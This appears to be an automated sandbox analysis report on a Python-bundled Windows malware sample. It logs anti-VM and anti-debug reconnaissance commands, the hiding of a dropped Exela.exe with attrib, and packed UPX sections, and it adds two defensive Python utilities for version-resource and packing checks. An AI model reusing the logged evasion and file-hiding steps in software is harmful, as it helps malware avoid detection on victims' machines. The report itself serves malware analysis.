            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120211904.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120115665.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457245244.00007FFDA3472000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460676756.00007FFDA549C000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457439135.00007FFDA355D000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450302164.00007FFD93D07000.00000004.00000001.01000000.00000017.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459467676.00007FFDA4348000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457747412.00007FFDA36CE000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458141259.00007FFDA3733000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459169072.00007FFDA4177000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460091484.00007FFDA4DAF000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457964302.00007FFDA370B000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458978291.00007FFDA3FDC000.00000004.00000001.01000000.00000023.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460440524.00007FFDA5477000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2456768038.00007FFDA3304000.00000004.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000000.2126704993.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFynix.exej% vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458771892.00007FFDA3AFD000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458345789.00007FFDA3A93000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454765569.00007FFD944E5000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython310.dll. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440853445.0000018B46A80000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459699045.00007FFDA4639000.00000004.00000001.01000000.0000001D.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeBinary or memory string: OriginalFilenameFynix.exej% vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
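The "OriginalFilename ... vs ..." entries above come from comparing the OriginalFilename value in each image's version resource with the name the sample was run under: the main binary calls itself Fynix.exe, and the dropped CPython runtime and .pyd extension modules each report their own names, which is the footprint of a PyInstaller-style bundle. The block below is an added example, not Joe Sandbox's or the sample's code, that reproduces the check by scanning a file for the UTF-16LE OriginalFilename key of a StringFileInfo block and then flags the Python-bundle pattern from the collected names. The VS_VERSIONINFO bytes it runs on are constructed inline; the 4-byte alignment and the "looks like a file name" filter are assumptions, and the hypothetical `_string_entry` helper exists only to build the fixture.

```python
"""Added example: pull OriginalFilename out of a PE's version resource by a
byte scan (no pefile dependency) and compare it with the on-disk file name,
the way the sandbox's "OriginalFilename ... vs <sample>" lines do."""
from __future__ import annotations

import re
import struct
from pathlib import PureWindowsPath

# A StringFileInfo "String" entry is: WORD wLength, WORD wValueLength, WORD wType,
# szKey (UTF-16LE, NUL-terminated), padding to a 32-bit boundary, then the value.
_KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"
# Heuristic (assumption): a plausible OriginalFilename is a short, simple file name.
_NAME_RE = re.compile(r"^[\w.\- ]{1,260}$")


def _read_utf16z(data: bytes, pos: int, max_chars: int = 260) -> str:
    """Read a NUL-terminated UTF-16LE string starting at pos."""
    chars = []
    while pos + 1 < len(data) and len(chars) < max_chars:
        unit = data[pos:pos + 2]
        if unit == b"\x00\x00":
            break
        chars.append(unit)
        pos += 2
    return b"".join(chars).decode("utf-16-le", errors="replace")


def extract_original_filenames(data: bytes) -> list[str]:
    """Every OriginalFilename value found in data (a PyInstaller stub can carry
    the version blocks of several bundled modules, as this report shows)."""
    names = []
    for m in re.finditer(re.escape(_KEY), data):
        pos = m.end()
        # Skip the alignment padding between key and value (assumes the resource
        # is 4-byte aligned in the file, which FileAlignment guarantees).
        while pos + 1 < len(data) and data[pos:pos + 2] == b"\x00\x00":
            pos += 2
        value = _read_utf16z(data, pos)
        if _NAME_RE.match(value):
            names.append(value)
    return names


def compare_original_filename(sample_path: str, data: bytes) -> dict:
    """Report whether any embedded OriginalFilename disagrees with the on-disk name."""
    on_disk = PureWindowsPath(sample_path).name.lower()
    names = extract_original_filenames(data)
    return {
        "on_disk": on_disk,
        "original_filenames": names,
        "mismatch": any(n.lower() != on_disk for n in names),
    }


def looks_like_python_bundle(names: list[str]) -> bool:
    """PyInstaller-style bundle: a CPython DLL plus compiled extension modules."""
    lower = [n.lower() for n in names]
    has_runtime = any(n.startswith("python3") and n.endswith(".dll") for n in lower)
    has_ext = any(n.endswith(".pyd") for n in lower)
    return has_runtime and has_ext


def _string_entry(key: str, value: str) -> bytes:
    """Constructed StringFileInfo String entry (test fixture, not real resource data)."""
    body = key.encode("utf-16-le") + b"\x00\x00"
    while (6 + len(body)) % 4:          # pad so the value starts 32-bit aligned
        body += b"\x00"
    body += value.encode("utf-16-le") + b"\x00\x00"
    while (6 + len(body)) % 4:          # pad so the next entry starts aligned
        body += b"\x00"
    return struct.pack("<HHH", 6 + len(body), len(value) + 1, 1) + body


# Constructed fixture: a DOS stub followed by a fragment of a StringFileInfo block
# naming the binary Fynix.exe, as the report observed for this sample.
CONSTRUCTED_VERSIONINFO = (
    b"MZ" + b"\x00" * 102
    + _string_entry("CompanyName", "Example Corp")
    + _string_entry("OriginalFilename", "Fynix.exe")
    + _string_entry("ProductVersion", "1.0.0.0")
)

# Names reported on this page for the main binary and the files it drops.
REPORTED_NAMES = [
    "Fynix.exe", "python310.dll", "python3.dll", "sqlite3.dll", "vcruntime140.dll",
    "_lzma.pyd", "_bz2.pyd", "_sqlite3.pyd", "_asyncio.pyd", "_hashlib.pyd",
    "_ssl.pyd", "_ctypes.pyd", "_socket.pyd", "select.pyd", "unicodedata.pyd",
]

if __name__ == "__main__":
    print(compare_original_filename("SecuriteInfo.com.FileRepMalware.22561.28030.exe",
                                    CONSTRUCTED_VERSIONINFO))
    print("python bundle:", looks_like_python_bundle(REPORTED_NAMES))
```

On a real file, pass `open(path, "rb").read()` as `data`; a memory dump such as the .sdmp regions listed above works the same way, which is why the report finds the module names in the parent process's memory as well as in the dropped files.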
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: Commandline size = 3647
            Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
            Source: libcrypto-1_1.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.998771639088251
            Source: libssl-1_1.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9903694614553314
            Source: python310.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9993369105871887
            Source: sqlite3.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9979559935490694
            Source: unicodedata.pyd.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9941871279761905
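The "UPX1 ZLIB complexity" figures above are a packing heuristic: the sandbox zlib-compresses each section's raw bytes and reports compressed size over original size. A value near 1.0 means the bytes do not compress any further, which is what a UPX1 section holding an already-compressed image looks like, while ordinary code and data sections land well below that. The block below is an added example, not Joe Sandbox's implementation, that computes the same ratio per section with a minimal section-table parser, builds a constructed two-section PE image to run it on, and uses an assumed 0.95 cutoff; the `build_test_pe` and `pseudo_random` helpers are fixtures for the demonstration only.

```python
"""Added example: per-section zlib 'complexity' (compressed size / raw size),
the packing heuristic behind the report's UPX1 lines. Standard library only."""
from __future__ import annotations

import hashlib
import struct
import zlib

# Assumed cutoff: the UPX1 sections in this report score 0.99+, and plain code
# sections typically compress to well under 0.9 of their size.
PACKED_THRESHOLD = 0.95


def parse_sections(pe: bytes) -> list[dict]:
    """Minimal PE section-table walk: DOS header -> e_lfanew -> COFF header -> sections."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]   # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]      # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        sections.append({
            "name": name.rstrip(b"\x00").decode("ascii", errors="replace"),
            "virtual_size": vsize,
            "raw_size": raw_size,
            "raw_ptr": raw_ptr,
        })
    return sections


def zlib_complexity(data: bytes) -> float:
    """Compressed/raw ratio, clamped to 1.0 (zlib adds a few bytes of framing)."""
    if not data:
        return 0.0
    return min(1.0, len(zlib.compress(data, 9)) / len(data))


def section_complexities(pe: bytes) -> dict[str, float]:
    return {
        s["name"]: zlib_complexity(pe[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]])
        for s in parse_sections(pe)
    }


def packed_sections(pe: bytes, threshold: float = PACKED_THRESHOLD) -> list[str]:
    """Section names whose raw bytes do not compress, i.e. look packed or encrypted."""
    return [name for name, c in section_complexities(pe).items() if c >= threshold]


def pseudo_random(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic high-entropy filler standing in for a packed payload."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_test_pe(sections: list[tuple[str, bytes]]) -> bytes:
    """Constructed PE32+ image with just enough structure for parse_sections.
    It is a parser fixture, not a loadable executable."""
    file_align, opt_size = 0x200, 0xF0            # 0xF0 = PE32+ optional header size
    headers_len = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    headers_len = -(-headers_len // file_align) * file_align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)         # PE32+ magic
    table, body = b"", b""
    raw_ptr, vaddr = headers_len, 0x1000
    for name, data in sections:
        raw_size = -(-len(data) // file_align) * file_align
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\x00"),
                             len(data), vaddr, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data.ljust(raw_size, b"\x00")
        raw_ptr += raw_size
        vaddr += max(0x1000, -(-len(data) // 0x1000) * 0x1000)
    headers = (bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + table).ljust(headers_len, b"\x00")
    return headers + body


if __name__ == "__main__":
    sample = build_test_pe([(".text", b"\x90" * 2048), ("UPX1", pseudo_random(4096))])
    for name, c in section_complexities(sample).items():
        print(f"{name:8s} zlib complexity {c:.4f}")
    print("packed:", packed_sections(sample))
```

Against the dropped files listed above, `packed_sections(open("python310.dll", "rb").read())` would return `["UPX1"]`; the UPX0 section, which is only a reserved virtual range with no raw data, scores 0.0 and is skipped by the threshold.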
            Source: classification engine Classification label: mal100.rans.spre.phis.troj.spyw.evad.winEXE@141/144@6/6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\ExelaUpdateService\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Mutant created: \Sessions\1\BaseNamedObjects\E
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3928:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3700:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1016:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1112:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3768:120:WilError_03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922
            Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\cmd.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe ReversingLabs: Detection: 50%
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe String found in binary or memory: set-addPolicy
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe String found in binary or memory: id-cmc-addExtensions
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe String found in binary or memory: can't send non-None value to a just-started generator
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe String found in binary or memory: --help
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe String found in binary or memory: --help
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
